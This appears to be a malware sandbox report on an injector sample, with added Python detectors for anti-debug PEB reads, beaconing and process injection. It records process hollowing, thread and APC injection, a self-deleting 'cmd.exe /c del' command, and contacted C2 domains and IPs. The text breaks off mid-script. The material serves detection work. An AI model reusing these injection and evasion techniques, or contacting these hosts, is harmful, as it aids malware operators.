Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0453FE3F mov eax, dword ptr fs:[00000030h] 14_2_0453FE3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04558ED6 mov eax, dword ptr fs:[00000030h] 14_2_04558ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B36CC mov eax, dword ptr fs:[00000030h] 14_2_044B36CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C8EC7 mov eax, dword ptr fs:[00000030h] 14_2_044C8EC7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0453FEC0 mov eax, dword ptr fs:[00000030h] 14_2_0453FEC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B16E0 mov ecx, dword ptr fs:[00000030h] 14_2_044B16E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044976E2 mov eax, dword ptr fs:[00000030h] 14_2_044976E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0451FE87 mov eax, dword ptr fs:[00000030h] 14_2_0451FE87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04550EA5 mov eax, dword ptr fs:[00000030h] 14_2_04550EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04550EA5 mov eax, dword ptr fs:[00000030h] 14_2_04550EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04550EA5 mov eax, dword ptr fs:[00000030h] 14_2_04550EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045046A7 mov eax, dword ptr fs:[00000030h] 14_2_045046A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449EF40 mov eax, dword ptr fs:[00000030h] 14_2_0449EF40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449FF60 mov eax, dword ptr fs:[00000030h] 14_2_0449FF60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04558F6A mov eax, dword ptr fs:[00000030h] 14_2_04558F6A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0451FF10 mov eax, dword ptr fs:[00000030h] 14_2_0451FF10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0451FF10 mov eax, dword ptr fs:[00000030h] 14_2_0451FF10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BA70E mov eax, dword ptr fs:[00000030h] 14_2_044BA70E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BA70E mov eax, dword ptr fs:[00000030h] 14_2_044BA70E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0455070D mov eax, dword ptr fs:[00000030h] 14_2_0455070D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0455070D mov eax, dword ptr fs:[00000030h] 14_2_0455070D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044AF716 mov eax, dword ptr fs:[00000030h] 14_2_044AF716
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04484F2E mov eax, dword ptr fs:[00000030h] 14_2_04484F2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04484F2E mov eax, dword ptr fs:[00000030h] 14_2_04484F2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BE730 mov eax, dword ptr fs:[00000030h] 14_2_044BE730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C37F5 mov eax, dword ptr fs:[00000030h] 14_2_044C37F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04507794 mov eax, dword ptr fs:[00000030h] 14_2_04507794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04507794 mov eax, dword ptr fs:[00000030h] 14_2_04507794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04507794 mov eax, dword ptr fs:[00000030h] 14_2_04507794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04498794 mov eax, dword ptr fs:[00000030h] 14_2_04498794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A0050 mov eax, dword ptr fs:[00000030h] 14_2_044A0050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A0050 mov eax, dword ptr fs:[00000030h] 14_2_044A0050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04551074 mov eax, dword ptr fs:[00000030h] 14_2_04551074
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04542073 mov eax, dword ptr fs:[00000030h] 14_2_04542073
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04554015 mov eax, dword ptr fs:[00000030h] 14_2_04554015
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04554015 mov eax, dword ptr fs:[00000030h] 14_2_04554015
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04507016 mov eax, dword ptr fs:[00000030h] 14_2_04507016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04507016 mov eax, dword ptr fs:[00000030h] 14_2_04507016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04507016 mov eax, dword ptr fs:[00000030h] 14_2_04507016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449B02A mov eax, dword ptr fs:[00000030h] 14_2_0449B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449B02A mov eax, dword ptr fs:[00000030h] 14_2_0449B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449B02A mov eax, dword ptr fs:[00000030h] 14_2_0449B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449B02A mov eax, dword ptr fs:[00000030h] 14_2_0449B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B002D mov eax, dword ptr fs:[00000030h] 14_2_044B002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B002D mov eax, dword ptr fs:[00000030h] 14_2_044B002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B002D mov eax, dword ptr fs:[00000030h] 14_2_044B002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B002D mov eax, dword ptr fs:[00000030h] 14_2_044B002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B002D mov eax, dword ptr fs:[00000030h] 14_2_044B002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h] 14_2_0451B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0451B8D0 mov ecx, dword ptr fs:[00000030h] 14_2_0451B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h] 14_2_0451B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h] 14_2_0451B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h] 14_2_0451B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h] 14_2_0451B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044858EC mov eax, dword ptr fs:[00000030h] 14_2_044858EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04489080 mov eax, dword ptr fs:[00000030h] 14_2_04489080
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04503884 mov eax, dword ptr fs:[00000030h] 14_2_04503884
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04503884 mov eax, dword ptr fs:[00000030h] 14_2_04503884
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C90AF mov eax, dword ptr fs:[00000030h] 14_2_044C90AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h] 14_2_044B20A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h] 14_2_044B20A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h] 14_2_044B20A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h] 14_2_044B20A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h] 14_2_044B20A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h] 14_2_044B20A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BF0BF mov ecx, dword ptr fs:[00000030h] 14_2_044BF0BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BF0BF mov eax, dword ptr fs:[00000030h] 14_2_044BF0BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BF0BF mov eax, dword ptr fs:[00000030h] 14_2_044BF0BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044AB944 mov eax, dword ptr fs:[00000030h] 14_2_044AB944
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044AB944 mov eax, dword ptr fs:[00000030h] 14_2_044AB944
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448C962 mov eax, dword ptr fs:[00000030h] 14_2_0448C962
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448B171 mov eax, dword ptr fs:[00000030h] 14_2_0448B171
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448B171 mov eax, dword ptr fs:[00000030h] 14_2_0448B171
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04489100 mov eax, dword ptr fs:[00000030h] 14_2_04489100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04489100 mov eax, dword ptr fs:[00000030h] 14_2_04489100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04489100 mov eax, dword ptr fs:[00000030h] 14_2_04489100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A4120 mov eax, dword ptr fs:[00000030h] 14_2_044A4120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A4120 mov eax, dword ptr fs:[00000030h] 14_2_044A4120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A4120 mov eax, dword ptr fs:[00000030h] 14_2_044A4120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A4120 mov eax, dword ptr fs:[00000030h] 14_2_044A4120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A4120 mov ecx, dword ptr fs:[00000030h] 14_2_044A4120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B513A mov eax, dword ptr fs:[00000030h] 14_2_044B513A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B513A mov eax, dword ptr fs:[00000030h] 14_2_044B513A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448B1E1 mov eax, dword ptr fs:[00000030h] 14_2_0448B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448B1E1 mov eax, dword ptr fs:[00000030h] 14_2_0448B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448B1E1 mov eax, dword ptr fs:[00000030h] 14_2_0448B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045141E8 mov eax, dword ptr fs:[00000030h] 14_2_045141E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044AC182 mov eax, dword ptr fs:[00000030h] 14_2_044AC182
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BA185 mov eax, dword ptr fs:[00000030h] 14_2_044BA185
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B2990 mov eax, dword ptr fs:[00000030h] 14_2_044B2990
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B61A0 mov eax, dword ptr fs:[00000030h] 14_2_044B61A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B61A0 mov eax, dword ptr fs:[00000030h] 14_2_044B61A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045051BE mov eax, dword ptr fs:[00000030h] 14_2_045051BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045051BE mov eax, dword ptr fs:[00000030h] 14_2_045051BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045051BE mov eax, dword ptr fs:[00000030h] 14_2_045051BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045051BE mov eax, dword ptr fs:[00000030h] 14_2_045051BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045069A6 mov eax, dword ptr fs:[00000030h] 14_2_045069A6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454EA55 mov eax, dword ptr fs:[00000030h] 14_2_0454EA55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04514257 mov eax, dword ptr fs:[00000030h] 14_2_04514257
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04489240 mov eax, dword ptr fs:[00000030h] 14_2_04489240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04489240 mov eax, dword ptr fs:[00000030h] 14_2_04489240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04489240 mov eax, dword ptr fs:[00000030h] 14_2_04489240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04489240 mov eax, dword ptr fs:[00000030h] 14_2_04489240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0453B260 mov eax, dword ptr fs:[00000030h] 14_2_0453B260
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0453B260 mov eax, dword ptr fs:[00000030h] 14_2_0453B260
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C927A mov eax, dword ptr fs:[00000030h] 14_2_044C927A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04558A62 mov eax, dword ptr fs:[00000030h] 14_2_04558A62
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454AA16 mov eax, dword ptr fs:[00000030h] 14_2_0454AA16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454AA16 mov eax, dword ptr fs:[00000030h] 14_2_0454AA16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04498A0A mov eax, dword ptr fs:[00000030h] 14_2_04498A0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A3A1C mov eax, dword ptr fs:[00000030h] 14_2_044A3A1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04485210 mov eax, dword ptr fs:[00000030h] 14_2_04485210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04485210 mov ecx, dword ptr fs:[00000030h] 14_2_04485210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04485210 mov eax, dword ptr fs:[00000030h] 14_2_04485210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04485210 mov eax, dword ptr fs:[00000030h] 14_2_04485210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448AA16 mov eax, dword ptr fs:[00000030h] 14_2_0448AA16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448AA16 mov eax, dword ptr fs:[00000030h] 14_2_0448AA16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C4A2C mov eax, dword ptr fs:[00000030h] 14_2_044C4A2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C4A2C mov eax, dword ptr fs:[00000030h] 14_2_044C4A2C
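The "mov eax, dword ptr fs:[00000030h]" evidence above is the sandbox flagging reads of the PEB pointer out of the TEB (fs:[0x30] on 32-bit Windows, gs:[0x60] on 64-bit); what matters for triage is which PEB field is read next (BeingDebugged, NtGlobalFlag, or the Ldr list used for API resolution). The scanner below is an added example, not Joe Sandbox code: it finds those encodings in a raw code blob and classifies the following instruction. The byte sample at the bottom is constructed for the example; the instruction encodings are the standard Intel ones.

```python
"""Static scan for PEB-pointer reads in x86/x64 code (added example)."""
import re
from typing import Dict, List

# (byte pattern, register loaded, mnemonic). Standard Intel encodings.
_PEB_READS = [
    (rb"\x64\xA1\x30\x00\x00\x00", "eax", "mov eax, fs:[0x30]"),          # moffs32 form
    (rb"\x64\x8B\x05\x30\x00\x00\x00", "eax", "mov eax, fs:[0x30]"),      # ModRM form
    (rb"\x64\x8B\x0D\x30\x00\x00\x00", "ecx", "mov ecx, fs:[0x30]"),
    (rb"\x64\x8B\x15\x30\x00\x00\x00", "edx", "mov edx, fs:[0x30]"),
    (rb"\x64\x8B\x1D\x30\x00\x00\x00", "ebx", "mov ebx, fs:[0x30]"),
    (rb"\x65\x48\x8B\x04\x25\x60\x00\x00\x00", "rax", "mov rax, gs:[0x60]"),  # x64 PEB
]
# ModRM r/m value of the register that now holds the PEB pointer.
_BASE_RM = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3, "rax": 0}
# PEB offsets commonly dereferenced right after fetching the pointer.
_PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr (module list walk)", 0x68: "NtGlobalFlag"}


def _purpose(code: bytes, pos: int, reg: str) -> str:
    """Classify the instruction following a PEB read by the field it dereferences."""
    w = code[pos:pos + 5]
    if reg == "rax" and w and 0x48 <= w[0] <= 0x4F:   # skip REX.W on the x64 follow-up
        w = w[1:]
    rm = _BASE_RM[reg]
    # mod=01 (disp8) with our register as base: (ModRM & 0xC7) == 0x40 | rm
    if len(w) >= 3 and w[0] == 0x8A and (w[1] & 0xC7) == (0x40 | rm) and w[2] == 0x02:
        return "BeingDebugged"                              # mov r8, byte [reg+2]
    if len(w) >= 4 and w[0] == 0x0F and w[1] == 0xB6 and (w[2] & 0xC7) == (0x40 | rm) and w[3] == 0x02:
        return "BeingDebugged"                              # movzx r32, byte [reg+2]
    if len(w) >= 3 and w[0] == 0x8B and (w[1] & 0xC7) == (0x40 | rm):
        return _PEB_FIELDS.get(w[2], "PEB+0x%02x" % w[2])   # mov r32, [reg+disp8]
    return "unclassified"


def scan(code: bytes) -> List[Dict]:
    """All PEB-pointer reads in `code`, in address order, with their purpose."""
    hits = []
    for pat, reg, mnemonic in _PEB_READS:
        for m in re.finditer(pat, code):
            hits.append({"offset": m.start(), "register": reg, "instruction": mnemonic,
                         "purpose": _purpose(code, m.end(), reg)})
    return sorted(hits, key=lambda h: h["offset"])


def summarize(code: bytes) -> Dict[str, int]:
    """Per-register counts, the same shape as the sandbox evidence lines."""
    counts: Dict[str, int] = {}
    for h in scan(code):
        counts[h["register"]] = counts.get(h["register"], 0) + 1
    return counts


# Constructed sample: an anti-debug prologue followed by an x64 NtGlobalFlag check.
SAMPLE_CODE = (
    b"\x55\x8B\xEC"                            # push ebp; mov ebp, esp
    + b"\x64\xA1\x30\x00\x00\x00"              # mov eax, fs:[0x30]
    + b"\x0F\xB6\x40\x02"                      # movzx eax, byte [eax+2]   (BeingDebugged)
    + b"\x85\xC0"                              # test eax, eax
    + b"\x64\x8B\x0D\x30\x00\x00\x00"          # mov ecx, fs:[0x30]
    + b"\x8B\x41\x68"                          # mov eax, [ecx+0x68]       (NtGlobalFlag)
    + b"\x64\xA1\x30\x00\x00\x00"              # mov eax, fs:[0x30]
    + b"\x8B\x40\x0C"                          # mov eax, [eax+0x0C]       (Ldr)
    + b"\x65\x48\x8B\x04\x25\x60\x00\x00\x00"  # mov rax, gs:[0x60]
    + b"\x48\x8B\x40\x68"                      # mov rax, [rax+0x68]       (NtGlobalFlag)
    + b"\xC3"                                  # ret
)

if __name__ == "__main__":
    for h in scan(SAMPLE_CODE):
        print("0x%04x  %-22s -> %s" % (h["offset"], h["instruction"], h["purpose"]))
    print(summarize(SAMPLE_CODE))
```

Run it over a dumped code section (for this sample, the rundll32.exe region the report attributes the reads to) rather than the packed file on disk; the reads only exist after unpacking, which is why the sandbox reports them from memory.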
Enables debug privileges
Source: C:\Users\user\Desktop\Design Template.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00424EAA SetUnhandledExceptionFilter, 2_2_00424EAA
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00424EBC SetUnhandledExceptionFilter, 2_2_00424EBC

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 198.50.252.64 80
Source: C:\Windows\explorer.exe Domain query: www.gxjljc.com
Source: C:\Windows\explorer.exe Domain query: www.betralifcannabis.com
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80
Source: C:\Windows\explorer.exe Domain query: www.modomo.amsterdam
Source: C:\Windows\explorer.exe Domain query: www.bestflowersandgifts.com
Source: C:\Windows\explorer.exe Network Connect: 47.105.113.141 80
Source: C:\Windows\explorer.exe Domain query: www.2elden.com
Source: C:\Windows\explorer.exe Network Connect: 14.215.190.65 80
Source: C:\Windows\explorer.exe Domain query: www.zq2003.com
Source: C:\Windows\explorer.exe Domain query: www.landreclaim.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.rememberingedward.info
Source: C:\Windows\explorer.exe Network Connect: 156.226.160.56 80
Source: C:\Windows\explorer.exe Domain query: www.chuanyangwenhua.com
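The explorer.exe lines above are an injected shell process resolving and contacting a run of unrelated domains, and the Contacted URLs table at the end of this report shows the requests share one URI path (/ma3c/) and the same two query-parameter names; only one of the hosts is the live C2, the rest are decoys from the configuration. The detector below is an added example, not code from this report or its sandbox: it flags a Windows system binary that reaches several distinct hosts with one shared path inside a short window and reports the parameter names common to all of them. Event records are constructed for the example (host names and parameter names come from this report; parameter values, timestamps and the benign traffic are made up), and the thresholds are assumptions rather than a published rule.

```python
"""Fan-out beaconing from a Windows system process (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple, Set, Tuple
from urllib.parse import parse_qs, urlsplit

# Images that should not be beaconing to arbitrary hosts on their own.
SYSTEM_IMAGES = {"explorer.exe", "rundll32.exe", "svchost.exe", "dllhost.exe", "msiexec.exe"}


class HttpEvent(NamedTuple):
    ts: datetime
    image: str   # process image name as an EDR or proxy log records it
    url: str


def fanout_alerts(events: List[HttpEvent], min_hosts: int = 3,
                  window: timedelta = timedelta(minutes=10)) -> List[Dict]:
    """One alert per (image, path) where a system image reached at least
    `min_hosts` distinct hosts with the same URI path inside `window`."""
    groups: Dict[Tuple[str, str], List[HttpEvent]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        groups[(ev.image.lower(), urlsplit(ev.url).path)].append(ev)

    alerts = []
    for (image, path), evs in groups.items():
        if image not in SYSTEM_IMAGES:
            continue
        # Sliding window over the time-ordered events: keep the largest host set.
        best: Set[str] = set()
        for i, start in enumerate(evs):
            hosts = {urlsplit(e.url).hostname for e in evs[i:] if e.ts - start.ts <= window}
            if len(hosts) > len(best):
                best = hosts
        if len(best) < min_hosts:
            continue
        # Query keys present in every request of the group: the beacons here keep
        # the key names fixed and vary only the values.
        shared = None
        for e in evs:
            keys = set(parse_qs(urlsplit(e.url).query))
            shared = keys if shared is None else shared & keys
        alerts.append({"image": image, "path": path, "hosts": sorted(best),
                       "shared_params": sorted(shared or ())})
    return alerts


_T0 = datetime(2021, 4, 12, 10, 0, 0)   # constructed timestamps
SAMPLE_EVENTS = [
    HttpEvent(_T0, "explorer.exe", "http://www.zq2003.com/ma3c/?_h0PX=Gz1&nflpdH=xVJtBJipx"),
    HttpEvent(_T0 + timedelta(minutes=1), "explorer.exe", "http://www.rememberingedward.info/ma3c/?nflpdH=xVJtBJipx&_h0PX=RuF"),
    HttpEvent(_T0 + timedelta(minutes=2), "explorer.exe", "http://www.bestflowersandgifts.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=IYn"),
    HttpEvent(_T0 + timedelta(minutes=3), "explorer.exe", "http://www.landreclaim.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=AAA"),
    HttpEvent(_T0 + timedelta(minutes=4), "explorer.exe", "http://www.msftconnecttest.com/connecttest.txt"),
    # A browser fanning out to many hosts is normal and must not fire.
    HttpEvent(_T0 + timedelta(minutes=1), "chrome.exe", "http://news.example.com/index.html"),
    HttpEvent(_T0 + timedelta(minutes=2), "chrome.exe", "http://shop.example.net/index.html"),
    HttpEvent(_T0 + timedelta(minutes=3), "chrome.exe", "http://mail.example.org/index.html"),
]

if __name__ == "__main__":
    for a in fanout_alerts(SAMPLE_EVENTS):
        print(a)
```

The image allow-list is the part to tune: the report also shows rundll32.exe being hollowed, so it belongs on the list, while a browser or updater legitimately fans out and is excluded. Pair the alert with the injection evidence in the next section rather than treating it as proof on its own.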
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Design Template.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Design Template.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Design Template.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Design Template.exe Thread register set: target process: 3292
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 3292
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Design Template.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Design Template.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 1030000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Design Template.exe Process created: C:\Users\user\Desktop\Design Template.exe C:\Users\user\Desktop\Design Template.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Design Template.exe'
Source: explorer.exe, 00000007.00000002.504496251.0000000001400000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.505387149.0000000003050000.00000002.00000001.sdmp Binary or memory string: uProgram Manager
Source: explorer.exe, 00000007.00000002.504496251.0000000001400000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.505387149.0000000003050000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000002.504496251.0000000001400000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.505387149.0000000003050000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.504496251.0000000001400000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.505387149.0000000003050000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000002.502832403.0000000000EB8000.00000004.00000020.sdmp Binary or memory string: ProgmanX
Source: explorer.exe, 00000007.00000000.303083961.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndAj
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00431B5C GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA, 2_2_00431B5C
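The injection evidence above is spread over five signatures, and the chain only becomes clear once the lines are grouped by injector and target: the sample unmaps rundll32.exe's image and maps an RWX section into it (hollowing), maps a section into explorer.exe and queues an APC there, and the hollowed rundll32.exe in turn maps RW and RWX sections into explorer.exe before spawning cmd.exe to delete the original file. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses those evidence lines and labels each (source, target) pair. The sample lines are copied from this section; the technique labels are this script's own, and the PID-only "Thread register set" targets are listed separately because the report gives no PID-to-image mapping.

```python
"""Reconstruct the injection chain from sandbox behaviour lines (added example)."""
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Evidence lines copied from this report section (trailing link text included).
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\Design Template.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior",
    r"Source: C:\Users\user\Desktop\Design Template.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write Jump to behavior",
    r"Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior",
    r"Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior",
    r"Source: C:\Users\user\Desktop\Design Template.exe Thread register set: target process: 3292 Jump to behavior",
    r"Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 3292 Jump to behavior",
    r"Source: C:\Users\user\Desktop\Design Template.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior",
    r"Source: C:\Users\user\Desktop\Design Template.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 1030000 Jump to behavior",
    r"Source: C:\Users\user\Desktop\Design Template.exe Process created: C:\Users\user\Desktop\Design Template.exe C:\Users\user\Desktop\Design Template.exe Jump to behavior",
    r"Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Design Template.exe' Jump to behavior",
]

_SRC = r"^Source: (?P<src>.+?) "
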